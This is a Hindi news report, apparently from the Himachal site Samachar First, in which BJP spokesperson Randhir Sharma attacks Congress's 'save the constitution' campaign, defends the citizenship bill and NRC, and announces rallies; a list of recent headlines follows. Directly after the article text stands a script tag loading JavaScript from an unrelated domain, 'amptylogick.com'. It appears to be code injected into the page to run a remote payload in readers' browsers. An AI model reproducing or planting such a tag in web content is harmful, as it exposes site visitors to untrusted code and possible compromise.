संविधान बचाओ अभियान को संविधान नहीं, कांग्रेस बचाओ अभियान को चला रही कांग्रेसः रणधीर शर्मा

<p>हिमाचल प्रदेश बीजेपी के प्रदेश मुख्य प्रवक्ता रणधीर शर्मा ने कांग्रेस के संविधान बचाओ अभियान को संविधान नहीं कांग्रेस बचाओ अभियान करार दिया है। रणधीर शर्मा ने कहा कि कांग्रेस के प्रदेश अध्यक्ष भाजपा नेताओं पर झूठे आरोप लगा रहे हैं। कांग्रेस प्रदेश अध्यक्ष का भाजपा पर यह आरोप की भाजपा नेताओं ने आजादी के समय देश के खिलाफ काम किया सरासर निराधार है। बीजेपी की स्थापना 1980 में हुई थी जबकि देश को आजादी 1947 में मिल गयी थी।</p>

<p>आजादी हासिल करने में जनसंघ के लोगों की अहम भूमिका रही जिसे कांग्रेस पार्टी से प्रधानमंत्री जवाहरलाल नेहरू ने खुद कहा था। हाल ही में देश की सरकार के सिटिज़न बिल और एनआरसी जैसे देश हित मे लिए गए निर्णयों को जिस गलत भावना से कांग्रेस और दूसरी पार्टियां प्रचारित कर रही है वो इनकी हताशा का परिणाम है।कानून के प्रावधानों के मुताबिक देश के किसी भी नागरिक की नागरिकता लेने का जिक्र ही नहीं है, बावजूद इसका दुष्प्रचार करने में कांग्रेस लगी हुई है। कांग्रेस का संविधान बचाने नहीं बल्कि कांग्रेस के अस्तित्व को बचाने की कवायद भर है। लेकिन देश और प्रदेश की जनता इनसे कारनामो को जानती है कि कांग्रेस ने देश का कितना नुकसान किया है।</p>

<p>भाजपा इनके षड्यंत्र को बेनकाब करेगी। जिसके लिए बीजेपी देश भर में जनजागरण अभियान शुरू कर रही है। हिमाचल प्रदेश में भी 1 से 15 जनवरी तक अभियान चलाया जाएगा जिसके अंतर्गत प्रदेश में 90 संगोष्ठी और 17 जिला मुख्यालयों में रैली का आयोजन होगा। रणधीर शर्मा ने कहा कि हिमाचल प्रदेश में विधानसभा चुनावों में भाजपा का मत प्रतिशत 68.95 % रहा जो कि पहले से 15 फीसदी ज्यादा है&nbsp; जबकि कांग्रेस को केवल 27 प्रतिशत वोट मिले जो करीब 15 फीसदी कम रहा है भाजपा का जनाधार बढ़ा है जबकि कांग्रेस का घटा है। बढ़ते जनाधार और वोट को देखते हुए विपक्षी पार्टियां बौखलाहट में और अब देश के लोगों को विघटन की कोशिशों में जुट गई है।</p>

<p>कांग्रेस नेताओं में खुद को आगे ले जाने और बड़ा नेता साबित करने की जंग चली हुई है जिसके लिए कांग्रेस नेता अनाप शनाप ब्याजवजी से भी गुरेज नही कर रही।प्रदेश सरकार ने दो सालों के अभूतपूर्व निर्णयों के ज़रिए कई सफलाओं को हासिल कर देश भर में नाम कमाया है। जबकि ग्लोबल इंवेस्टर्ज़ मीट में 93 हज़ार करोड़ के एमओयू और 13 हज़ार करोड़ के निवेश को रिकार्ड समय मे धरातल पर उतारने में सफलता हासिल की है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

4 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

5 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

6 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

6 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

7 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

7 hours ago